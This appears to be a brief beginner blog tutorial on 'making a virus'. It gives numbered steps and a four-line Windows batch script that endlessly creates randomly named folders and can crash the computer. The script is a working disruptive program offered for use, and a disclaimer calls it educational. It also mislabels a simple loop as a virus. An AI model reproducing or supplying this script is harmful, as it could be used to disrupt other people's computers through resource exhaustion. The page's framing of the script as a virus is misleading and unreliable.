How to make a virus !
Sometimes clicking on any of virus files causes a lot of problems on our computer. So let’s find out what the virus is, how it is made. This virus can be made in Windows 7, 8, 10. How to create a virus in a batch file. Let us know.
1ST STEP: Create a Folder on your Desktop Or laptop
2ND STEP: Open Notepad in that folder
3RD STEP: Write below this code properly line by line (giving space in between word which required) in your notepad
@echo off
:a
md %random%
goto :a
4TH STEP: Save the notepad .bat extension
Example: batch_file.bat, earth.bat, omm.bat, narayan.bat…. etc
See the save Method below photograph-
5TH STEP: After saving the file, you will find a file inside the folder you created. Thousands of folders will be created automatically by clicking on that .bat file.
Disclaimer: Thousands of folders will be created automatically by clicking on a file. Computers can be crashed due to the creation of so many folders. So Shutdown or force-stopping the computer will solve the problem. It will only be used in educational purposes. It would be considered a crime if someone else did something bad on a computer. Tutor will not be held responsible for this.